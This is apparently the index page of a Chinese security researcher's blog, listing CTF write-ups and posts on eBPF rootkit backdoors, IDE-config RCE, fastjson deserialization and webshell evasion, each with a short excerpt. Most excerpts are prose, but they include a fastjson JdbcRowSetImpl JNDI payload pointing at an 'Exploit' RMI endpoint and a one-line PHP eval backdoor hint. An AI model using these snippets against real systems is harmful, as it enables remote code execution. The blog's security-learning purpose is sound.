rmb122's notebook

XcodeGhost in 2025

Wed, 12 Nov 2025 22:09:55 +0800

背景

在上网冲浪时, 发现一篇文章提到了 XcodeGhost. 想起之前只是了解了大概, 就又去仔细搜索了下 XcodeGhost 事件的细节, 发现 icloud-analysis.com 这个域名目前居然是无主状态, 于是有了接下来的故事.

利用 eBPF 技术配合 http 服务实现隐藏后门程序

Fri, 01 Nov 2024 21:38:06 +0800

背景

eBPF 作为 Linux 内核的一个功能, 目前已经被广泛运用在各个发行版中. 比如 systemd 就用了 eBPF 来限制服务的权限, 可以运行 bpftool prog list 来查看当前加载的 eBPF 程序, 大概率会出现一堆 systemd 加载的 eBPF 程序.

eBPF 程序运行在内核的虚拟机中, 很难不让人想到可以拿来作为 rootkit 用, 事实上目前已经有了很多开源 eBPF rootkit, 比如TripleCross和ebpfkit, 可以实现大部分 rootkit 的功能. 但是目前的 eBPF rootkit 都需要额外启动一个用户态程序来实现命令执行功能. 这样 eBPF 程序只用于隐藏自身和下发命令, 执行命令则完全依靠长期运行的用户态程序.

Burpsuite 特征识别及其对抗措施

Sun, 14 Aug 2022 12:26:13 +0800

某日, 我的同学突然 @crane 问我有没有能检测 burp 的方法. 突然想起来之前就看见过别人的 burp 被拦截, 但是当时测试下来由于我的 burp 不会被拦截, 所以就没有太在意. 现在回想起来有点在意为什么会出现这种检测上的选择性, 于是刚好学习一下相关方法了解原因.

利用项目配置文件进行 RCE - IDE Trust Project 功能探究

Sat, 02 Oct 2021 20:43:33 +0000

最近发现在打开 IDEA, VSCode 项目时候, 都增加了 “信任此项目的提示”. 结合这些 IDE 的特点, 确实可能存在在打开项目时产生 RCE 的风险, 特别是进行代码审计的安全人员, 会经常打开未知的项目. 正常人肯定不会贸然的执行未知的代码, 但是对于打开项目时这个弹出的框框, 可能并不会特别在意. 接下来分析一些通过这些配置来进行 RCE 的方法.

hxp CTF resonator Writeup - SSRF via file_put_contents

Wed, 30 Dec 2020 15:02:46 +0000

题目简介

在刚结束的 hxpCTF 中出现了一题跟 🍊 的 One line php challenge 一样短小精悍但非常有趣的题目. 长度只有五行,

2020 CISCN 华东北赛区 WEB Writeup

Sat, 19 Sep 2020 22:14:55 +0000

一共 6 题 WEB, 我一个人拿了 4 个一血, 还有一题全场 0 解. 然而没有 pwn 爷爷依旧被吊打, 而且题目质量是真的差, 明年再打国赛我是傻逼.

DDCTF 2020 Writeup

Mon, 07 Sep 2020 21:48:48 +0000

今年改了赛制, 可以两人组队, 我觉得改的还是不错的, 终于不用现场表演学习逆向和 pwn 了, 成功和 Ary 师傅打到了第三 233

TCTF/0CTF 2020 Writeup

Mon, 29 Jun 2020 19:49:05 +0000

又是一年 0CTF, 这次一个人一队单刷一次, 做出了两题 WEB, 可惜只输出了一天, 第二天还要赶 ddl, 还是太蔡了 orz

fastjson 1.2.68 反序列化漏洞 gadgets 挖掘笔记

Fri, 12 Jun 2020 22:15:32 +0000

以此祭奠找 gadgets 逝去的青春, orz

Codeql 踩坑记录 (二)

Tue, 31 Mar 2020 23:06:52 +0000

首先需要解决的就是上次留下的问题, 添加自定义的 taint track.
在自带的 tests 中就有示例, 可以参考 ql/python/ql/test/library-tests/taint/extensions/ExtensionsLib.qll

Codeql 踩坑记录

Mon, 30 Mar 2020 23:24:40 +0000

安装

入口: https://help.semmle.com/codeql/codeql-cli/procedures/get-started.html
下载地址: https://github.com/github/codeql-cli-binaries/releases
license: https://securitylab.github.com/tools/codeql/license

fastjson RCE 分析

Sat, 01 Feb 2020 18:18:25 +0000

简介

先看经典 payload

1{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

ysoserial URLDNS, CommonsCollectionsX 分析

Mon, 20 Jan 2020 17:45:51 +0000

之前都是 ysoserial 一把梭, 还是得学习 + 复现一下内部实现机制的.

2019 高校运维 ezcms 复现

Mon, 13 Jan 2020 00:04:55 +0000

之前高校运维碰到的题目, 当时就我一个人输出 web + 自己太菜了, 就没做出来 _(:3」∠)_, 寒假有时间看看, 复现一下题目.

OGeek 线下 Java Web And XCTF Final babytaint Writeup

Thu, 31 Oct 2019 22:37:15 +0000

因为最近课程非常非常多, 还顺带考试 + 实验报告, 咕咕咕掉了许多比赛, 真正去的也只有 OGeek, 其他都是云比赛.
拿做出来的题目里面选两题写个 Writeup 吧, 不然太久没更新了 (逃

Ogeek Easy Realworld Challenge 1&2 Writeup

Wed, 28 Aug 2019 09:58:59 +0000

这次 Ogeek 的 web 都挺有意思. 这两题偏向代码审计, 而且如题目名 Easy Realworld, 都是审计应用本身的漏洞, 差不多就是找 0day 了, 在这里分享给大家.

深入理解字符编码以及 GBK 注入

Tue, 06 Aug 2019 16:13:47 +0000

以前对 UTF-8, UTF-16, unicode, GBK, ASCII 之类的都是一知半解, 其实深入之后了解这些并不困难.

PHP 扩展学习

Wed, 31 Jul 2019 17:11:21 +0000

PHP 类似于 python 也是运行在解释器上的, PHP 的叫 zend, python 的叫 cpython,
这些都是官方实现, 像 python 也有 jython, pypy 啥的, 用其他语言写的解释器.

利用 PHP Trait 特性绕过 D 盾查杀

Thu, 25 Jul 2019 15:14:14 +0000

帮着公司审着代码, 发现一个 PHP 挺好玩的特性, 突发奇想, 想看看能不能绕 D 盾, 没想到就成了.

CyBRICS CTF Samizdat Writeup

Mon, 22 Jul 2019 09:56:31 +0000

这题是在比赛结束后才做出来的, 比较可惜, 但是题目本身还是比较有意思的, 所以写个 Writeup.
(早知道早点起床做题了

RCTF2019 baby_crypto & baby_aes

Wed, 22 May 2019 17:51:21 +0000

密码学只做出来两题 baby, 暗示我还是学密码学的 baby (逃

自制一个简单的 Hashpump

Sat, 11 May 2019 00:02:02 +0000

在学完 MD5/SHA1 之后, 很快就能搞懂 hashpump 的原理, 本质是因为类 MD 哈希函数
包括 MD5, SHA1, SHA2 都是将信息填充为一个 Block 长度的倍数以后分 Block 一轮轮计算的,
最后输出的是寄存器拼接在一起的值, 所以假设用以下公式计算签名

Ciscn 2019 初赛 Writeup

Thu, 25 Apr 2019 00:23:14 +0000

输出了两题 web + 一题 crypto, 太菜了 QAQ
因为也是要交上去的, 就写的比较简单了.

DDCTF2019 Writeup

Thu, 25 Apr 2019 00:17:49 +0000

历时 N 天, 滴滴终于审完了 Writeup, 终于可以发 wp 了, 我从 33 名到 16 名, 太真实了…
部分题目质量还是不错的 _(:з」∠)_, 因为要交上去, 所以就没截图了, 凑合看吧 (逃

干掉 PHP 不死马

Thu, 04 Apr 2019 23:20:56 +0000

在 AWD 模式下经常碰到不死马, 不干掉的话就会一直被偷 flag, 很难受. 所以研究一下怎么干掉.

0ctf Wallbreaker Easy Writeup

Tue, 26 Mar 2019 16:06:31 +0000

本文首发于先知

周末打了两天, 自闭 web 狗就做出来这一题, 另一题不知道调用啥 mbean 能拿 shell. 总之题目质量真的是非常高, 学到了很多.

描述

1Imagick is a awesome library for hackers to break `disable_functions`.
2So I installed php-imagick in the server, opened a `backdoor` for you.
3Let's try to execute `/readflag` to get the flag.
4Open basedir: /var/www/html:/tmp/949c1400c8390865cb5939a106fec0b6
5Hint: eval($_POST["backdoor"]);

从一道 CTF 题了解密码学中的 Meet-in-the-middle 攻击

Mon, 25 Mar 2019 23:26:21 +0000

本文首发于先知

在家里无聊打了 nullcon, 其中有一题用到了 Meet-in-the-middle 这种攻击方式,
在这里分享给大家.

Hgame Writeup

Sat, 09 Mar 2019 00:45:02 +0000

happyPython

随便 fuzz 一下发现 404 页面有模板注入, http://118.25.18.223:3001/asd%7B%7Bconfig%7D%7D.
拿到 'SECRET_KEY': '9RxdzNwq7!nOoK3*', 把 session 里的 user_id 改成 1 就行了.

Padding Oracle + CBC 字节翻转学习

Thu, 21 Feb 2019 17:04:38 +0000

之前一直就很想了解的技术, 这次同样是在 hgame 上碰到, 刚好从师傅那里学习一下, 更详细的可以去看 wiki.

简单来讲就是通过服务器对 Padding 正确和错误返回的不同状态, 来猜解所谓的中间值, 从而达成解密数据, 伪造数据.

DNS Rebind 在 SSRF 中的作用

Thu, 21 Feb 2019 16:34:34 +0000

这几天沉迷 hgame, 题目质量还是不错的, 其中有一题用到了 DNS rebind, 这里重新记一下笔记. 因为我估计也没多少人看我博客 233, 就直接写了, 不等比赛结束了.

Thinkphp >= 5.0.23 RCE 分析

Wed, 16 Jan 2019 19:03:53 +0000

起因是刚出来那天刚好有个站是 5.0.23 但是分析文章没给完整的截图, 打了码. 干脆自己分析一波写写 poc.

PHP 支持的各种协议学习

Fri, 04 Jan 2019 18:27:17 +0000

PHP 支持了不少协议, 特别是其中的 php:// 和 phar:// 经常能在意想不到的地方发挥意想不到的作用 233. 之前都是花式百度, 这次系统学习一下. 所有的协议都可以在官网上找到.

这些协议一般配合 file_get_contents, include 使用, 部分情况下受到 php.ini 里面的 allow_url_fopen(默认开启) 和 allow_url_include(默认关闭) 限制. 如果 allow_url_include 开启的话, 是非常危险的, 可能存在远程文件包含.

C1CTF 2018 Writeup

Wed, 12 Dec 2018 21:57:13 +0000

Misc

0x01 签到

base64 解码一下就行, 不懂的同学可以看一下这个

1$ base64 -d 
2QzFDVEZ7dzNsZWMwbWVfdE9fQzFDVEZ9
3C1CTF{w3lec0me_tO_C1CTF}

HCTF2018 WriteUp

Mon, 12 Nov 2018 00:18:29 +0000

和师傅们肝了两天, 最后排名 25, 看看一堆没做出来的题, 感到自己深深的菜…

开发一个简单的 Chrome 拓展

Thu, 14 Jun 2018 00:42:47 +0000

每次复制域名时都会被 Chrome 复制地址时的 https:// 烦到, 所以干脆自己写个拓展来解决这个问题. Chrome 拓展其实就是一个小网页, 也就是 HTML, 所以我们可以用 JavaScript 来实现获取域名和复制的操作. 具体实现如下.

base64 编码原理详解

Thu, 26 Apr 2018 08:22:44 +0000

之前一直都是直接无脑

1from base64 import b64encode as b64e

只知道大概 base64 是啥东西, 今天突然心血来潮花了几分钟了解了下 base64, 其实原理并不复杂.

牛顿迭代法求平方根

Wed, 31 Jan 2018 19:57:48 +0000

牛顿法可以求一些非线性方程的近似解. 而对于求平方根, 可以将 $y = \sqrt{x}$ 化成方程 $x^2 - a = 0$ 中求 $x$ 的值, $x$ 即为 $a$ 的开根号, 根据牛顿法定义, 可以写出以下程序

RSA 加密及解密

Fri, 24 Nov 2017 16:55:26 +0000

对于解题来说一般会给你以下信息：模数N、公钥E和密文C. 如果只是做题的话